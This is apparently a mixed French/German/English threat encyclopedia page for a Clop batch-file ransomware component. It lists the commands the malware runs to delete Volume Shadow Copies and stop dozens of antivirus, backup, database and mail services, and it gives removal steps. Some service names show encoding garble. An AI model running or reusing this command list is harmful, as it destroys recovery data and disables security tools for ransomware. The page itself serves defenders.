Ransom:BAT/Clop.D (Microsoft)

 Plate-forme:

Windows

 Overall Risk:
 Dommages potentiels: :
 reportedInfection:
Faible
Medium
Élevé
Critique

  • Type de grayware:
    Ransomware

  • Destructif:
    Non

  • Chiffrement:
     

  • In the wild::
    Oui

  Overview


  Détails techniques

File size: 6,412 bytes
File type: COM
Memory resident: Oui
Date de réception des premiers échantillons: 04 novembre 2019

Installation

Fügt die folgenden Prozesse hinzu:

  • vssadmin resize shadowstorage /for=%System Root% /on=%System Root% /maxsize=401MB
  • vssadmin resize shadowstorage /for=%System Root% /on=%System Root% /maxsize=unbounded
  • vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • vssadmin Delete Shadows /all /quiet
  • net stop SQLAgent$SYSTEM_BGC /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos Device Control Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop macmnsvc /y
  • net stop SQLAgent$ECWDB2 /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Zoolz 2 Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop McTaskManager /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos AutoUpdate Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos System Protection Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop EraserSvc11710 /y
  • net stop PDVFSService /y
  • net stop SQLAgent$PROFXENGAGEMENT /y
  • net stop SAVService /y
  • net stop MSSQLFDLauncher$TPSAMA /y
  • net stop EPSecurityService /y
  • net stop SQLAgent$SOPHOS /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Symantec System Recovery\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop Antivirus /y
  • net stop SstpSvc /y
  • net stop MSOLAP$SQL_2008 /y
  • net stop TrueKeyServiceHelper /y
  • net stop sacsvr /y
  • net stop VeeamNFSSvc /y
  • net stop FA_Scheduler /y
  • net stop SAVAdminService /y
  • net stop EPUpdateService /y
  • net stop VeeamTransportSvc /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos Health Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop bedbg /y
  • net stop MSSQLSERVER /y
  • net stop KAVFS /y
  • net stop Smcinst /y
  • net stop MSSQLServerADHelper100 /y
  • net stop TmCCSF /y
  • net stop wbengine /y
  • net stop SQLWriter /y
  • net stop MSSQLFDLauncher$TPS /y
  • net stop SmcService /y
  • net stop ReportServer$TPSAMA /y
  • net stop swi_update /y
  • net stop AcrSch2Svc /y
  • net stop MSSQL$SYSTEM_BGC /y
  • net stop VeeamBrokerSvc /y
  • net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • net stop VeeamDeploymentService /y
  • net stop SQLAgent$TPS /y
  • net stop DCAgent /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos Message Router\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop MSSQLFDLauncher$SBSMONITORING /y
  • net stop MySQL80 /y
  • net stop MSOLAP$SYSTEM_BGC /y
  • net stop ReportServer$TPS /y
  • net stop MSSQL$ECWDB2 /y
  • net stop SntpService /y
  • net stop SQLSERVERAGENT /y
  • net stop BackupExecManagementService /y
  • net stop SMTPSvc /y
  • net stop mfefire /y
  • net stop BackupExecRPCService /y
  • net stop MSSQL$VEEAMSQL2008R2 /y
  • net stop klnagent /y
  • net stop MSExchangeSA /y
  • net stop MSSQLServerADHelper /y
  • net stop SQLTELEMETRY /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos Clean Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop swi_update_64 /y
  • net stop \xce\x93\xc3\x87\xc2\xa3Sophos Web Control Service\xce\x93\xc3\x87\xc2\xa5 /y
  • net stop EhttpSrv /y
  • net stop POP3Svc /y
  • net stop MSOLAP$TPSAMA /y
  • net stop McAfeeEngineService /y
  • %System%\net1 stop SQLAgent$SYSTEM_BGC /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos Device Control Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop macmnsvc /y
  • %System%\net1 stop SQLAgent$ECWDB2 /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Zoolz 2 Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop McTaskManager /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos AutoUpdate Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos System Protection Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop EraserSvc11710 /y
  • %System%\net1 stop PDVFSService /y
  • %System%\net1 stop SQLAgent$PROFXENGAGEMENT /y
  • %System%\net1 stop SAVService /y
  • %System%\net1 stop MSSQLFDLauncher$TPSAMA /y
  • %System%\net1 stop EPSecurityService /y
  • %System%\net1 stop SQLAgent$SOPHOS /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Symantec System Recovery\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop Antivirus /y
  • %System%\net1 stop SstpSvc /y
  • %System%\net1 stop MSOLAP$SQL_2008 /y
  • %System%\net1 stop TrueKeyServiceHelper /y
  • %System%\net1 stop sacsvr /y
  • %System%\net1 stop VeeamNFSSvc /y
  • %System%\net1 stop FA_Scheduler /y
  • %System%\net1 stop SAVAdminService /y
  • %System%\net1 stop EPUpdateService /y
  • %System%\net1 stop VeeamTransportSvc /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos Health Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop bedbg /y
  • %System%\net1 stop MSSQLSERVER /y
  • %System%\net1 stop KAVFS /y
  • %System%\net1 stop Smcinst /y
  • %System%\net1 stop MSSQLServerADHelper100 /y
  • %System%\net1 stop TmCCSF /y
  • %System%\net1 stop wbengine /y
  • %System%\net1 stop SQLWriter /y
  • %System%\net1 stop MSSQLFDLauncher$TPS /y
  • %System%\net1 stop SmcService /y
  • %System%\net1 stop ReportServer$TPSAMA /y
  • %System%\net1 stop swi_update /y
  • %System%\net1 stop AcrSch2Svc /y
  • %System%\net1 stop MSSQL$SYSTEM_BGC /y
  • %System%\net1 stop VeeamBrokerSvc /y
  • %System%\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • %System%\net1 stop VeeamDeploymentService /y
  • %System%\net1 stop SQLAgent$TPS /y
  • %System%\net1 stop DCAgent /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos Message Router\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop MSSQLFDLauncher$SBSMONITORING /y
  • %System%\net1 stop MySQL80 /y
  • %System%\net1 stop MSOLAP$SYSTEM_BGC /y
  • %System%\net1 stop ReportServer$TPS /y
  • %System%\net1 stop MSSQL$ECWDB2 /y
  • %System%\net1 stop SntpService /y
  • %System%\net1 stop SQLSERVERAGENT /y
  • %System%\net1 stop BackupExecManagementService /y
  • %System%\net1 stop SMTPSvc /y
  • %System%\net1 stop mfefire /y
  • %System%\net1 stop BackupExecRPCService /y
  • %System%\net1 stop MSSQL$VEEAMSQL2008R2 /y
  • %System%\net1 stop klnagent /y
  • %System%\net1 stop MSExchangeSA /y
  • %System%\net1 stop MSSQLServerADHelper /y
  • %System%\net1 stop SQLTELEMETRY /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos Clean Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop swi_update_64 /y
  • %System%\net1 stop \xce\x93\xc3\x87\xc2\xa3Sophos Web Control Service\xce\x93\xc3\x87\xc2\xa5 /y
  • %System%\net1 stop EhttpSrv /y
  • %System%\net1 stop POP3Svc /y
  • %System%\net1 stop MSOLAP$TPSAMA /y
  • %System%\net1 stop McAfeeEngineService /y

(Hinweis: %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.. %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)

  Solutions

Moteur de scan minimum: 9.850

Step 1

Für Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.

Step 2

Dateien erkennen und deaktivieren, die als Ransom.BAT.STOP.A entdeckt wurden

[ learnMore ]
  1. Für Windows 98 und ME Benutzer: Der Windows Task-Manager zeigt möglicherweise nicht alle aktiven Prozesse an. Verwenden Sie in diesem Fall einen Prozess-Viewer eines Drittanbieters, vorzugsweise Process Explorer, um die Malware-/Grayware-/Spyware-Datei zu beenden. Dieses Tool können Sie hier.
  2. herunterladen.
  3. Wenn die entdeckte Datei im Windows Task-Manager oder Process Explorer angezeigt wird, aber nicht gelöscht werden kann, starten Sie Ihren Computer im abgesicherten Modus neu. Klicken Sie auf diesen Link, um alle erforderlichen Schritte anzuzeigen.
  4. Wenn die entdeckte Datei nicht im Windows Task-Manager oder im Process Explorer angezeigt wird, fahren Sie mit den nächsten Schritten fort.

Step 3

Durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt, und löschen Sie Dateien, die als Ransom.BAT.STOP.A entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.

Step 4

Restore encrypted files from backup.


Participez à notre enquête!